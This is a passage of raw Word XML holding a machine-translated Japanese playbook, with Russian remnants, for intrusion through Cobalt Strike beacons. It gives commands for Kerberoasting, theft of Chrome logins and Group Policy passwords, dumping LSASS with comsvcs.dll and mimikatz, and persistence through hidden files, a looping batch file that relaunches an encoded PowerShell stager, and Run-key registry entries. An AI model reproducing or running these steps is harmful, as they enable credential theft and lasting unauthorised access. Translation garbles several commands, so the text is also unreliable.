      <w:r>
        <w:t>:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\asrephashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E78E99E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>結果のファイルをダウンロードします (結果が生成された場合)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA71FCD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>そうでない場合は、別の PowerShell スクリプトを使用して攻撃を実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BC74C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-import /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-dev\Recon\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C99A7EB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>アナログ：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBBF22" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-import /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-dev\Recon\Invoke-Kerberoast.ps1 を実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70503F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psinject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4728 x86 Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OutputFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HashCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> |フロリダ州 |出力ファイル -ファイルパス c:\ProgramData\pshashes.txt -append -force -エンコード UTF8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC35303" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">            この場合の 4728 は現在の PID で、x86 はそのビット幅です</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F545090" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">      (受信したハッシュはブルートに送信され、パスワードの平文を取得するか、SYSTEM権限のコンテキストで使用されます)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3802D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B790C59" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Chrome ブラウザからの情報</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">の収集 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB8F8B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>アセンブリの実行/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobalt_strike_extension_kit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/exe/SharpChrome.exe logins /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>showall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B1E9FD5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(ここでは、現在のユーザーのパスワードのセットと、彼が行くネットワークと外部リソースのアイデアを取得します)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E6B480" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA771BD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ドメインのグループ ポリシー ファイルに保存されているパスワード</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">を確認する </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC30DF7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>アセンブリの実行/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobalt_strike_extension_kit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/exe/Net-GPPPassword.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FBA050" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>アナログ：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3441DFF9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-import /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-dev/Exfiltration/Get-GPPPassword.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A3529" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1660B3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(特権権限のみ*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788A811" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="60A46386" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">  PRIVILEGED権限がある場合は、「hashdump」および「logonpasswords」コマンドを使用してハッシュとパ</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>スワードを取得できます。 これはパスワードをすばやく取得する方法ですが、機能しない場合があります。 たとえば、AVが邪魔になります。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8AF33C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>次のことを行うことをお勧めします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1F952" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>を作成し、LSASS.exeプロセスを見つけます(パスワードを保存します)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6A54B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>ダンプにします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315FF44E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ビーコンに行き</w:t>
      </w:r>
      <w:r>
        <w:t>ましょう。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C27CE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>- CDのWindows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFFF103" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- シェルrundll32.exe C:\ Windows \ System32 \ comsvcs.dll、 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ミニダンプ PID C:\Users\User1\lsass.dmp がいっぱいです </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECDDE80" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-で </w:t>
      </w:r>
      <w:r>
        <w:t>PID パラメータは、LSASS.exe の PID 番号を指定します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDA93E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>書き込みが許可されている任意のディレクトリ (C:\Users\User1\lsass.dmp など) を使用できます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B29A13" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>アナログ</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CD899E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>- アセンブリの実行 /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobalt_strike_extension_kit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/exe/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SharpDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> にあります.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32254D83" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ダンプを作成したら、ダウンロードします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1B6FA2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ダウンロードしたら、マシンで</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>を開き、次のコマンドを実行します。(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsass.dmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>は</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>でフォルダに入れます)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239679E9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">セクルサ::ミニダンプ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LSASS.dmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5ECFB43D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logonPasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>の</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logonPasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="614264C5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4B20C6E3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="437ACCD4" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5910BD1A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="72337159" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3A905A8B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>！------------------------------------------------------固執-----------------------------------------------------！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE6009" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(権限なしでも実行可能)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7156F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> explorers.batを作成し、次のコードを追加します(括弧はコピーしないでください)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212E06D6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC90C77" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>@echoオフ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F0316F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">セット </w:t>
      </w:r>
      <w:r>
        <w:t>フルネーム=C:\Temp\explorers.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA54113" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>prog=explorers.exe を設定します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE2FE6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>：始める</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164054A9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /fi "IMAGENAME eq %prog%"|&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> find "%prog%"||"" "%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%" を開始します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCA386" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>ping 127.1 -n 6 を描画します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A1423" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :開始 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A834EFE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A3CAA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次に</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、explorers.exe load と explorers.bat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>batnik</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> を、ファイルを書き込むことができる任意のディレクトリ (例: "C:\Users\User1\Pictires") にロードします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E763028" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次に</w:t>
      </w:r>
      <w:r>
        <w:t>、CSを開き、ビーコンを開いて、ファイルをアップロードしたフォルダーに移動します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572245AC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">コマンドを実行します </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ファイルが非表示になります)。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7BAD7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>シェル属性 +h [explorers.exe]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67279E66" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>シェル属性 +h [探検家.bat]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F49627" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次に、 </w:t>
      </w:r>
      <w:r>
        <w:t>レジストリにキーを追加します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433153F9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F5065" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076C23D6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>検証:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA786DB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>シェル登録クエリ "HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run" / s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED6FA6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>------------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE12952" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>PowerShell ステージャーを使用できますが、通常のユーザーとして実行すると、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ウィンドウが表示され、デスクトップにすぐに閉じます</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFAE57D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1642B6D1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>@echoオフ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C3191" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>フルネーム=PowerShell.exe を設定します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B63FA7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">set paramtr= powershell -nop -w hidden -encodedcommand...(ваш stager) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB49115" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>prog=powershell.exe を設定します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E9AEF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>：始める</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFAA787" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /fi "IMAGENAME eq %prog%"|&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> find "%prog%"||開始 "" "%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%" "" "%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paramtr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF9C4AE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>&gt;ヌルping 127.1 -n 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB0A7F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :開始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE8852" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5097FE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次に、 </w:t>
      </w:r>
      <w:r>
        <w:t>レジストリにキーを追加します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3BBD2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKEY_CURRENT_USER\ Software \ Microsoft \ Windows \ CurrentVersion \ Run" / v explorers / t REG_SZ / d "C:\ Temp \ explorers .bat"</w:t>
      </w:r>
    </w:p>
